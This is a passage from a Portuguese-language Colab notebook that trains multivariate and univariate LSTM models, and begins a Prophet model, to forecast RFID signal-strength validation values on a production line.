# + id="sP773dGUHImQ" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188578785, "user_tz": 180, "elapsed": 1490, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9350656c-2583-48ff-9701-11b58c7a6ff4"
from sklearn.metrics import mean_squared_error
from math import sqrt
for i in range(10):
actuals = [row[i] for row in yTest]
predicted = [forecast[i] for forecast in yPred]
rmse = sqrt(mean_squared_error(actuals, predicted))
print('t+%d RMSE: %f' % ((i+1), rmse))
# + [markdown] id="hXRpfPsMxEfB"
# Em valores que variam entre 0 e 1 o erro quadrático médio, para todos os períodos futuros estão próximos de 6.9%. Valor considerado coerente para natureza da operação. Se converter em RSSI, isso daria menos de 1db, ou seja, isso não influenciaria na qualidade da validação do sistema.
#
# Veremos em mais detalhes a frente com as devidas conversões.
#
# A função abaixo foi criada para facilitar a conversão inversa da transformação feita no inicio do estudo.
# + id="bXVXhyuDIH9Z" executionInfo={"status": "ok", "timestamp": 1607188614627, "user_tz": 180, "elapsed": 1013, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# inverse data transform on forecasts
# https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/
def inverse_transform(forecasts, scaler):
inverted = list()
for i in range(len(forecasts)):
# create array from forecast
forecast = np.array(forecasts[i])
forecast = forecast.reshape(1, len(forecast))
# invert scaling
inv_scale = scaler.inverse_transform(forecast)
inv_scale = inv_scale[0, :]
# store
inverted.append(inv_scale)
return inverted
# + [markdown] id="jr8-kkp5zuJQ"
# Conversão do yPred
# + id="QF0bP08cIXz7" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188648039, "user_tz": 180, "elapsed": 1383, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c05423a8-cbd0-4358-e99e-8097f8ce5f3b"
iforecasts = inverse_transform(yPred, scalerY)
iforecasts
# + [markdown] id="DQCsHLDU6Bkh"
# Conversão do Y Test
# + id="EsBFY94d0fWW" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188653010, "user_tz": 180, "elapsed": 1576, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="7634a240-bc37-4670-b043-4518a2479db2"
iyTest = inverse_transform(yTest, scalerY)
iyTest
# + [markdown] id="BTVNM7uX6Fpx"
# Conversão do Y Treino
# + id="nqA0Idxj0rj0" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188657711, "user_tz": 180, "elapsed": 2812, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="161ca579-fde6-44c3-b24f-6b3c486fe6db"
iyTrain = inverse_transform(y_Train, scalerY)
iyTrain
# + [markdown] id="kwFSy6MD6OIa"
# Após as conversões iremos criar um novo dataset para mostrar os resultados em um gráfico comparativo.
# + id="HCBm8mqa1YHO" executionInfo={"status": "ok", "timestamp": 1607188663024, "user_tz": 180, "elapsed": 1041, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
iforecasts = [row[:1] for row in iforecasts]
iyTest = [row[:1] for row in iyTest]
iyTrain = [row[:1] for row in iyTrain]
# + id="mF17Lr0j31IY" executionInfo={"status": "ok", "timestamp": 1607188665527, "user_tz": 180, "elapsed": 1034, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
iyTrain=np.array(iyTrain).reshape(-1)
iyTest=np.array(iyTest).reshape(-1)
iforecasts=np.array(iforecasts).reshape(-1)
# + id="gYHVU54C7bw2" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607188668643, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ac9ada94-7133-4846-9868-b9a6a19da5c3"
print(iyTrain.shape)
print(iyTest.shape)
# + id="7EP8cOLE_16e" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188675144, "user_tz": 180, "elapsed": 836, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="42c407a6-1638-4c7a-f810-8b259b841c0a"
dfOriginal = pd.DataFrame(iyTrain, columns=['TRAIN'])
dfOriginal
# + id="Z0RBBatTBS7b" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188679021, "user_tz": 180, "elapsed": 1044, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="40854732-2dc6-46bb-e4c8-35c40dd5baa5"
dfOriginalTest = pd.DataFrame(iyTest, columns=['TEST'])
dfOriginalTest.index = np.arange(len(dfOriginal)-1, len(dfOriginalTest)+len(dfOriginal)-1)
dfOriginalTest
# + id="E-oJH5swD1Dm" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188683834, "user_tz": 180, "elapsed": 998, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ee9c9890-0657-41c3-f538-318dd3e53922"
dftempor = pd.DataFrame(iforecasts, columns=['FORECAST'])
dftempor.index = dfOriginalTest.index
dfOriginalTest['FORECAST'] = dftempor['FORECAST']
dfOriginalTest
# + [markdown] id="5XhKywt47TEN"
# Escolhemos apenas uma fatia do todo para melhor visualizar o gráfico e entender a comparação dos resultados em relação ao Forecast.
# + id="y90L2TQxVYEl" colab={"base_uri": "https://localhost:8080/", "height": 592} executionInfo={"status": "ok", "timestamp": 1607188695238, "user_tz": 180, "elapsed": 1606, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2932be10-0f0a-43fb-d587-d1471d684c2a"
plt.figure(figsize=(25,10))
plt.plot(dfOriginal.iloc[35447:, :])
plt.plot(dfOriginalTest.iloc[:200, :])
plt.legend(['Train', 'Test', 'Forecast'])
plt.show()
# + [markdown] id="kW--pWwt7JXm"
# De acordo com a figura acima, percebemos que a linha do Forecast se manteve em tendencia uniforme para o modelo LSTM Multivariate.
# + [markdown] id="9xWFkjpg8ydC"
# #### Outros testes LSTM (Univariate)
# + [markdown] id="aUHbBdQU8-c2"
# No modelo a seguir iremos utilizar todos os métodos que ja foram desenvolvidos e explicados acima para gerar um novo modelo para um único atributo e assim comparar os resultados a fim de entender a relevância que os atributos escolhidos influenciam no resultado final.
# + colab={"base_uri": "https://localhost:8080/"} id="gDSb3jCb7IeW" executionInfo={"status": "ok", "timestamp": 1607188744531, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="62590071-fc42-41ec-b39d-9c68ac2505a5"
df_LSTMSingle = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_LSTMSingle
df_LSTMSingle = df_LSTMSingle.drop(['TIMESTAMP','EPC','MIN','MAX','MEAN','COUNT'], axis=1)
dfValuesSingle = df_LSTMSingle.values
dfValuesSingle = dfValuesSingle.astype('float32')
dfValuesSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 241} id="6Y0cw7tg-QcW" executionInfo={"status": "ok", "timestamp": 1607188747392, "user_tz": 180, "elapsed": 1339, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="166e7f1c-1507-475a-c48a-210082e7df04"
dfSingle = series_to_supervised(dfValuesSingle, n_in=30, n_out=10, dropnan=True)
dfSingle.head()
# + colab={"base_uri": "https://localhost:8080/"} id="AVFWMjyr_Gj6" executionInfo={"status": "ok", "timestamp": 1607188751468, "user_tz": 180, "elapsed": 1345, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2081a43d-85a0-48f1-d45f-21e5c02fb3ee"
X = np.array(dfSingle)[:, :30]
print ('Atributos (%d x %d):' % (X.shape[0],X.shape[1]))
print (X)
y = np.array(dfSingle)[:,30:]
print ('Classe (%d x %d):' % (y.shape[0],y.shape[1]))
print (y)
# + colab={"base_uri": "https://localhost:8080/"} id="d8NxKLa5_be-" executionInfo={"status": "ok", "timestamp": 1607188754517, "user_tz": 180, "elapsed": 1048, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b87a6435-6319-4626-a083-2f2cccb03a17"
scalerX = MinMaxScaler(feature_range=(0, 1))
scalerY = MinMaxScaler(feature_range=(0, 1))
X_N = scalerX.fit_transform(X)
y_N = scalerY.fit_transform(y)
print('Tamanho do Dataset: ', X_N.shape[0])
print('Quantidade de Períodos (Atributos): ', X_N.shape[1])
print('Quantidade de Períodos (Classe): ', y_N.shape[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 316} id="s_I4s5MU__jj" executionInfo={"status": "ok", "timestamp": 1607188756833, "user_tz": 180, "elapsed": 1037, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="e1ea0ae3-e22e-472f-9eb3-4bc8323a8d0e"
X_Train, X_Test, y_Train, y_Test = train_test_split(X_N, y_N, test_size=0.2, shuffle=False, random_state=100)
plt.pie([X_Train.shape[0],X_Test.shape[0]], labels=['Train','Test'], shadow=True)
plt.show()
print('Atributos - Train: ', X_Train.shape)
print('Atributos - Test:', X_Test.shape)
print('Classes - Train: ', y_Train.shape)
print('Classes - Test:', y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="LlTMp6fg__ra" executionInfo={"status": "ok", "timestamp": 1607188760318, "user_tz": 180, "elapsed": 1102, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cb5db85a-be3b-4929-bfad-4fb5d2dbcd3d"
X_Train = X_Train.reshape((X_Train.shape[0], 30, 1))
X_Test = X_Test.reshape((X_Test.shape[0], 30, 1))
print (X_Train.shape, X_Test.shape, y_Train.shape, y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/", "height": 775} id="RA-GT52UAhGm" executionInfo={"status": "ok", "timestamp": 1607189228107, "user_tz": 180, "elapsed": 457716, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8bedf881-fa24-4cd1-d1e9-6a88e8a7f1e9"
histSingle, modelSingle = fitModel(X_Train, y_Train, X_Test, y_Test, 64, 4, 15)
# + id="lkYG2QphA3Fu" executionInfo={"status": "ok", "timestamp": 1607189263472, "user_tz": 180, "elapsed": 1154, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
modelSingle.save('model_LSTM_Single.h5')
# + colab={"base_uri": "https://localhost:8080/"} id="rz4zOGpcA3Os" executionInfo={"status": "ok", "timestamp": 1607189537252, "user_tz": 180, "elapsed": 270830, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2b2e06ce-03bd-41c2-c729-1e63b3f1f9c7"
yPred = list()
for i in range (len(X_Test)):
forecast = predict_lstm(modelSingle, X_Test[i], 1)
yPred.append(forecast)
yPred
# + colab={"base_uri": "https://localhost:8080/"} id="LIW3NtISA3Uz" executionInfo={"status": "ok", "timestamp": 1607189537253, "user_tz": 180, "elapsed": 265587, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="38fe71e4-607d-4bec-fca2-a799d256a4ef"
yTest = [row[:] for row in y_Test]
yTest
# + colab={"base_uri": "https://localhost:8080/"} id="R8xqhIWtA3ca" executionInfo={"status": "ok", "timestamp": 1607189537254, "user_tz": 180, "elapsed": 256971, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2373e603-d612-4599-dd44-2053f3bd17c1"
for i in range(10):
actuals = [row[i] for row in yTest]
predicted = [forecast[i] for forecast in yPred]
rmse = sqrt(mean_squared_error(actuals, predicted))
print('t+%d RMSE: %f' % ((i+1), rmse))
# + colab={"base_uri": "https://localhost:8080/"} id="mgpse5YyA3ac" executionInfo={"status": "ok", "timestamp": 1607189561772, "user_tz": 180, "elapsed": 1657, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b5327263-7b29-4ec3-a378-b1cf21fff015"
iforecasts = inverse_transform(yPred, scalerY)
iforecasts
# + colab={"base_uri": "https://localhost:8080/"} id="IKtSklDtCPKq" executionInfo={"status": "ok", "timestamp": 1607189566234, "user_tz": 180, "elapsed": 1972, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3473120d-456e-4a53-bf11-5b93c0b10306"
iyTest = inverse_transform(yTest, scalerY)
iyTest
# + colab={"base_uri": "https://localhost:8080/"} id="f95kMctqCPNk" executionInfo={"status": "ok", "timestamp": 1607189570388, "user_tz": 180, "elapsed": 2718, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ac9e07aa-d98f-4240-f986-71ca842c5a99"
iyTrain = inverse_transform(y_Train, scalerY)
iyTrain
# + id="NG4YvuHVCPTe" executionInfo={"status": "ok", "timestamp": 1607189572927, "user_tz": 180, "elapsed": 1131, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
iforecasts = [row[:1] for row in iforecasts]
iyTest = [row[:1] for row in iyTest]
iyTrain = [row[:1] for row in iyTrain]
iyTrain=np.array(iyTrain).reshape(-1)
iyTest=np.array(iyTest).reshape(-1)
iforecasts=np.array(iforecasts).reshape(-1)
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Bv_EJrHrCPge" executionInfo={"status": "ok", "timestamp": 1607189576442, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cada1b5b-f131-4b2b-f6f5-21bc2f915bd1"
dfOriginalSingle = pd.DataFrame(iyTrain, columns=['TRAIN'])
dfOriginalSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Hd3ld8fYCPjq" executionInfo={"status": "ok", "timestamp": 1607189579862, "user_tz": 180, "elapsed": 1229, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="80749747-5db8-4f0c-9497-c137375b5caf"
dfOriginalTestSingle = pd.DataFrame(iyTest, columns=['TEST'])
dfOriginalTestSingle.index = np.arange(len(dfOriginalSingle)-1, len(dfOriginalTestSingle)+len(dfOriginalSingle)-1)
dfOriginalTestSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="eOMokwCxCPQ1" executionInfo={"status": "ok", "timestamp": 1607189582871, "user_tz": 180, "elapsed": 987, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="24765f85-dbee-451c-e79b-92c2b6488839"
dftempor = pd.DataFrame(iforecasts, columns=['FORECAST'])
dftempor.index = dfOriginalTestSingle.index
dfOriginalTestSingle['FORECAST'] = dftempor['FORECAST']
dfOriginalTestSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ZIawxDQxC1Zy" executionInfo={"status": "ok", "timestamp": 1607189590066, "user_tz": 180, "elapsed": 1700, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="99dd589d-41d5-4248-a3aa-a9e0cfb29f53"
plt.figure(figsize=(25,10))
plt.plot(dfOriginalSingle.iloc[35447:, :])
plt.plot(dfOriginalTestSingle.iloc[:200, :])
plt.legend(['Train', 'Test', 'Forecast'])
plt.show()
# + [markdown] id="rAxakC0KGGPa"
# #### Conclusão LSTM
# + [markdown] id="QxUincYiGRQX"
# Em relação aos dois modelos LSTM que utilizamos percebemos que não existem muitas diferenças entre eles, ou seja, o uso de todos os atributos não melhorou o modelo de forma significativa. A natureza dos dados coletados são uniformes, como vistos na analise estatísticas o que justifica essa mínima diferença entre os dois.
#
# Quanto a predição estar próxima dos -38 pode ser pelo fato da maioria dos dados de treino estarem dentro desse intervalo, como observado no histograma abaixo.
# + id="-qVg0nlGHhLY" colab={"base_uri": "https://localhost:8080/", "height": 320} executionInfo={"status": "ok", "timestamp": 1607189620694, "user_tz": 180, "elapsed": 1025, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="517e35f0-56e7-4a25-898e-52705591be6c"
plt.figure(figsize=(15,5))
plt.hist(iyTrain, cumulative=False)
plt.show()
# + [markdown] id="cwbFhYEUHlkf"
# Um ensaio foi feito apresentando para o modelo (utilizado o univariate) novos valores simulando uma condição de problema.
# + id="0bMPIixZBRsx" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190694755, "user_tz": 180, "elapsed": 997, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8d18f022-a239-4941-bedc-bc1d46d381c5"
NovaEntrada = np.array([[-60,-60,-60,-62,-62,-62,-62,-62,-55,-55,-55,-55,-55,-53,-53,-53,-53,-53,-53,-53,-60,-60,-60,-60,-60,-60,-62,-62,-62,-62]])
NovaEntrada.shape
# + id="dOepMMBHJv3m" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190695999, "user_tz": 180, "elapsed": 547, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="454bebb6-4915-4676-ff68-b4ae04a92c16"
NovaEntrada = scalerX.transform(NovaEntrada.reshape(1,30))
NovaEntrada
# + id="jq6ibeuGKM4L" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190697760, "user_tz": 180, "elapsed": 581, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c809d448-bfaa-425b-ee08-32194ac44fa6"
pred = predict_lstm(modelSingle, NovaEntrada.reshape(30,1), 1)
pred
# + id="dghEYfQMLDKL" executionInfo={"status": "ok", "timestamp": 1607190702944, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
pred = scalerY.inverse_transform(np.array(pred).reshape(1,10))
# + id="DYbnzB9cLnD6" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190705342, "user_tz": 180, "elapsed": 1477, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="1c7ced10-acb9-465b-c952-b102a51291c0"
pred
# + [markdown] id="3dP2alzAI5Id"
# Muitos resultados demonstraram um comportamento fora do padrão aceitável para o processo de validação na linha de produção que seria entre -37 e -39. Significa que através dessa predição o sistema poderia identificar um comportamento inaceitável.
# + [markdown] id="cgM-4nWeKFis"
# ### Prophet
# + [markdown] id="2lHXtsU1Rr8n"
# O modelo de previsão base do Prophet utiliza a equação abaixo:<br>
# y(t) = g(t) + h(t) + s(t) + et
#
# Onde:<br>
# g(t): função de tendência, que no Prophet pode ser linear ou logístico<br><br>
# s(t): sazonalidade, que neste caso são períodos específicos de tempo que podem afetar a tendência e por padrão são desativados no Prophet<br><br>
# h(t): ciclos do ano, que são os "feriados", os quais possuem uma listagem no Prophet específica por país e por padrão não são considerados no modelo<br><br>
# et: erro da previsão, que é tratado como distribuição gausiana no Prophet<br><br>
# O modelo do Prophet se baseia em uma análise univariada, sendo que os únicos parâmetros recebidos são o espaço de tempo (ds) e y(t) VALIDATION.
# + id="H23ENrpYA8bZ" executionInfo={"status": "ok", "timestamp": 1607190802632, "user_tz": 180, "elapsed": 2138, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from fbprophet import Prophet
from fbprophet.plot import add_changepoints_to_plot
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="N5-BbCxpBBxM" executionInfo={"status": "ok", "timestamp": 1607190849878, "user_tz": 180, "elapsed": 967, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b8928a44-fab4-4148-f8f1-9c92fa34befb"
df_original = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_original.tail()
# + [markdown] id="W6IlYIFvBcwh"
# O Prophet requer um dataframe contendo as colunas ds (datastamp) e y (classe).
# A coluna ds requer algum tipo de time stamp reconhecido pelo Pandas para poder treinar de maneira adequada.
# Neste caso, criou-se um range com data de inicio arbitraria, um tamanho igual ao tamanho do dataframe original e um incremento de um milissegundo.
# + id="av4T60bNBEN8" executionInfo={"status": "ok", "timestamp": 1607190894378, "user_tz": 180, "elapsed": 1035, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
time_index = pd.date_range(start='1/1/2019', periods=df_original.shape[0],freq='ms') # criação de série com time stamp com incremento de 1 ms
min_period = 0 # ponto inicial da análise do dataframe
max_period = df_original.shape[0] # ponto final da análise do dataframe
# + [markdown] id="_RwE_FJeCPvH"
# O novo dataset foi criado, mantendo-se apenas as colunas VALIDATION e TIMESTAMP do dataset original.
# Conforme necessário pelo Prophet, a coluna VALIDATION foi renomeada para y e a coluna TIMESTAMP foi renomeada para ds.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="wjaLCvvYBTjg" executionInfo={"status": "ok", "timestamp": 1607190927650, "user_tz": 180, "elapsed": 981, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="feb12b86-7bf1-4b98-d20b-6ae7d996292e"
df_Prophet = df_original.drop(['EPC','MIN','MAX','MEAN','COUNT'], axis=1) # Remoção das colunas EPC, MIN, MAX e COUNT
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds'}) # Coluna VALIDATION renomeada para y e coluna TIMESTAMP renomeada para ds
df_Prophet.head()
# + [markdown] id="jOj1vM8cDG1p"
# Como haviam inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="aEUiJx1NCw9A" executionInfo={"status": "ok", "timestamp": 1607190939897, "user_tz": 180, "elapsed": 984, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c67096d2-00ec-4c1a-9f79-39631ccad72b"
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0]) # Reset dos índices do dataframe com índice inicial 0
df_Prophet
# + [markdown] id="mR2rL-LtDYin"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="530iuupkCjWI" executionInfo={"status": "ok", "timestamp": 1607190959304, "user_tz": 180, "elapsed": 972, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f3f2e2b0-f364-405b-f89d-03e53220ae82"
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="7aTwrV6DDp1b" executionInfo={"status": "ok", "timestamp": 1607190969257, "user_tz": 180, "elapsed": 1020, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="257c3f84-09a9-46a7-c3d4-2db1c6b9467c"
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="QFED6IEsBMia"
# #### Prophet com crescimento linear
# O termo g(t) é o modelo de tendência do modelo de regressão aditiva utilizado pelo Prophet, ele pode ter modelo de crescimento linear ou logístico. <br>
# Para este primeiro teste realizado, aplicou-se o modelo linear, que necessita de um dataset com ds (date stamp) e y (valor análisado).<br>
# O modelo linear gera uma têndencia de crescimento linear, sendo que esta pode ser de crescimento positivo ou negativo.<br>
# O modelo linear não é capaz de lidar com alterações de tendência ou saturação de crescimento.
# + [markdown] id="Z0gZOnsUVjw0"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100
